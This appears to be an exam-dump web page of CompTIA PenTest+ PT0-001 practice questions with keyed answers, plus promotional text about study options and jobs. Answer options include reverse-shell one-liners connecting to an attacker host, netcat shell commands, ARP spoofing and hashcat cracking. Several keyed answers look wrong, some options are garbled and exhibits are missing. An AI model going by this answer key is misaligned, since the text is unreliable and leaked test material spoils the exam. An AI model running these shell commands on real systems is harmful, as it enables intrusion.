[Oct 31, 2021] PT0-001 Exam Dumps - Try Best PT0-001 Exam Questions - Prep4sureGuide
Verified PT0-001 exam dumps Q&As with Correct 250 Questions and Answers
NEW QUESTION 31
While reviewing logs, a web developer notices the following user input string in a field:
Which of the following types of attacks was done to the website?
- A. Blind XSS
- B. Persistent XSS
- C. Reflected XSS
- D. XSS injection
Answer: D
NEW QUESTION 32
A penetration tester identifies the following findings during an external vulnerability scan:
Which of the following attack strategies should be prioritized from the scan results above?
- A. Obsolete software may contain exploitable components
- B. Cryptographically weak protocols may be intercepted
- C. Web server configurations may reveal sensitive information
- D. Weak password management practices may be employed
Answer: B
NEW QUESTION 33
A penetration tester found a network with NAC enabled Which of the following commands can be used to bypass the NAC?
- A. iptafcles
D, proxychains - B. sslbump
- C. macchar.ger
Answer: C
NEW QUESTION 34
Which of the following attacks is commonly combined with cross-site scripting for session hijacking?
- A. CSRF
- B. Clickjacking
- C. SQLI
- D. RFI
Answer: A
NEW QUESTION 35
A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?
- A. An up-to-date list of possible exploits
- B. The latest vulnerability scan results
- C. A list of sample test accounts
- D. A list of sample application requests
Answer: D
NEW QUESTION 36
During testing, a critical vulnerability is discovered on a client's core server.
Which of the following should be the NEXT action?
- A. Take the target offline so it cannot be exploited by an attacker.
- B. Promptly alert the client with details of the finding.
- C. Complete all findings, and then submit them to the client.
- D. Disable the network port of the affected service.
Answer: A
NEW QUESTION 37
A penetration tester generates a report for a host-based vulnerability management agent that is running on a production web server to gather a list of running processes. The tester receives the following information.
Which of the following processes MOST likely demonstrates a lack of best practices?
- A. systemd
- B. apache2
- C. urlgrabber-ext
- D. dbus-daemon
Answer: D
NEW QUESTION 38
A MITM attack is being planned. The first step is to get information flowing through a controlled device. Which of the following should be used to accomplish this?
- A. Bluejacking
- B. Evil twin
- C. Replay attack
- D. War driving
- E. Repeating
Answer: B
NEW QUESTION 39
A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?
- A. nc -lvp 4444 /bin/bash
- B. nc -lp 4444 -e /bin/bash
- C. nc -vp 4444 /bin/bash
- D. nc -p 4444 /bin/bash
Answer: A
Explanation:
Explanation/Reference: https://netsec.ws/?p=292
NEW QUESTION 40
A penetration tester observes that several high numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?
- A. Disable unneeded services.
- B. Transition the application to another port
- C. Implement a web application firewall
- D. Filter port 443 to specific IP addresses
Answer: A
NEW QUESTION 41
A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
A)
B)
C)
D)
- A. Option D
- B. Option B
- C. Option A
- D. Option C
Answer: A
NEW QUESTION 42
A penetration tester is using the Onesixtyone tool on Kali Linux to try to exploit the SNMP protocol on a target that has SNMP enabled Which of the following types of attacks is the penetration tester performing?
- A. Man-in-the-middle attack
- B. Name resolution attack
- C. Buffer overflow attack
- D. Dictionary-based attack
Answer: D
NEW QUESTION 43
A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = "Administrator"
The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all
Answer:
Explanation:
Explanation
1.) NIST
2.) NSRT
3.) imdA
4.) TRAT
NEW QUESTION 44
A tester has captured a NetNTLMv2 hash using Responder Which of the following commands will allow the tester to crack the hash using a mask attack?
- A. hashcax -m 500 hash.txt
- B. hashc&t -m 5600 -a 3 haah.txt ?a?a?a?a?a?a?a?a
- C. hashcat -m 5600 -r rulea/beat64.rule hash.txt wordliat.txt
- D. hashcat -m 5600 -o reaulta.txt hash.txt wordliat.txt
Answer: B
NEW QUESTION 45
During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to impersonate network resources and collect authentication requests?
- A. Ettercap
- B. Responder
- C. Tcpdump
- D. Medusa
Answer: B
NEW QUESTION 46
A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?
- A. Pass the hash to relay credentials
- B. Password brute forcing to log into the host
- C. RID cycling to enumerate users and groups
- D. Session hijacking to impersonate a system account
Answer: D
Explanation:
Explanation
NEW QUESTION 47
Click the exhibit button.
A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?
- A. SNMP brute forcing
- B. SMTP relay
- C. ARP spoofing
- D. DNS cache poisoning
Answer: A
Explanation:
Explanation/Reference:
NEW QUESTION 48
A penetration tester generates a report for a host-based vulnerability management agent that is running on a production web server to gather a list of running processes. The tester receives the following information.
Which of the following processes MOST likely demonstrates a lack of best practices?
- A. systemd
- B. apache2
- C. urlgrabber-ext
- D. dbus-daemon
Answer: D
NEW QUESTION 49
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
- A. Static scan
- B. Vulnerability scan
- C. Compliance scan
- D. Dynamic scan
Answer: B
NEW QUESTION 50
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
- A. nc -nlvp 44444 -e /bin/sh
- B. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/ tmp/f
- C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/ tmp/f
- D. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/ tmp/f
- E. nc 192.168.1.5 44444
- F. nc -e /bin/sh 192.168.1.5 44444
Answer: A,B
Explanation:
Explanation/Reference:
References: https://www.reddit.com/r/hacking/comments/5ms9gv/help_reverse_shell_exploit/
NEW QUESTION 51
Which of the following properties of the penetration testing engagement agreement will have the largest impact on observing and testing production systems at their highest loads?
- A. Setting a schedule of testing access times
- B. Having management sign-off on intrusive testing
- C. Establishing a white-box testing engagement
- D. Creating a scope of the critical production systems
Answer: B
NEW QUESTION 52
A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?
- A. arpspoof -c both -t 192.168.1.20 192.168.1.253
- B. arpspoof -t 192.168.1.20 192.168.1.254
- C. arpspoof -r -t 192 .168.1.253 192.168.1.20
- D. arpspoof -c both -r -t 192.168.1.1 192.168.1.20
Answer: B
Explanation:
Reference:
https://www.hackers-arise.com/single-post/2017/07/25/Man-the-Middle-MiTM-Attack-with-ARPspoofing
NEW QUESTION 53
A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy:
Which of the following types of vulnerabilities is being exploited?
- A. Forced browsing vulnerability
- B. Parameter pollution vulnerability
- C. File upload vulnerability
- D. Cookie enumeration
Answer: D
NEW QUESTION 54
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled ''changepass."
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using "strings" to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
% s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?
- A. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token- stealing binary titled changepw. Then run changepass.
- B. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'.
- C. Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environmental variable to the path '/home/user/'. Then run changepass.
- D. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass.
Answer: B
NEW QUESTION 55
A recently concluded penetration test revealed that a legacy web application is vulnerable to SQL injection.
Research indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are not in a position to risk the availability on the application. Under such circumstances, which of the following controls are low-effort, short-term solutions to minimize the SQL injection risk? (Choose two.)
- A. Use a whitelist approach for SQL statements.
- B. Identify the source of malicious input and block the IP address.
- C. Identify and sanitize all user inputs.
- D. Identity and eliminate inline SQL statements from the code.
- E. Identify and eliminate dynamic SQL from stored procedures.
- F. Use a blacklist approach for SQL statements.
Answer: A,C
Explanation:
Explanation
NEW QUESTION 56
......
What preparation options should you use?
The CompTIA platform offers numerous options that the candidates can explore to prepare for the PT0-001 certification exam. They are highlighted below:
- Instructor-Led Training: You can also prepare for the certification exam by taking the official instructor-led training course. It is available as an in-classroom or virtual option.
- Practice Tests: You can also explore this tool to help you develop competence in the exam content. This is an adaptive practice test that helps reinforce your current understanding of the topics and identify the knowledge gaps, so you can work on your weak areas.
- Virtual Labs: It is recommended that the applicants have some level of practical experience before attempting the certification exam. If you don’t have the required experience in the field, you can gain it through virtual labs. The CompTIA PT0-001 virtual labs are interactive and offer practice resources that simulate the real-world IT configuration environment. The individuals can easily work in the role of an Administrator in the virtual environment as they complete fundamental and advanced tasks.
- e-Learning: The students can prepare for their test irrespective of their location or work schedule. The e-Learning training helps them develop mastery in the exam objectives using flashcards, videos, and performance-based adaptive practice tests.
- Study Guides: These are available as eBook and hard copy. You will find engaging and the highly informative content that focuses on the exam topics. The candidates can find the details of these books on the CompTIA webpage.
Job Roles Associated with CompTIA PT0-001 Exam
After passing the CompTIA PT0-001 exam, you become eligible for the PenTest+ certification. This certificate can help the IT professionals accelerate their career growth by adding the knowledge and skills that many recruiters are looking for. The certification is very valuable in terms of employment opportunities. There are several positions that you will qualify for after obtaining this certificate. Some of the job titles you can apply for include:
- Network Security Operator
- Vulnerability Assessment Analyst
- Penetration Tester
- Vulnerability Tester
- Security Analyst
Getting the CompTIA PenTest+ certification also enables you to earn a better salary. The estimated average annual income for the professionals holding this certificate amounts to $97,000. With some level of experience and additional industry-recognized certifications, you can get paid even more.
CompTIA PT0-001 Test Engine PDF - All Free Dumps: https://www.prep4sureguide.com/PT0-001-prep4sure-exam-guide.html
Get New PT0-001 Certification – Valid Exam Dumps Questions: https://drive.google.com/open?id=1xlGpWFIuW-HPw_Iv-sqaGybNTLFdBJ2N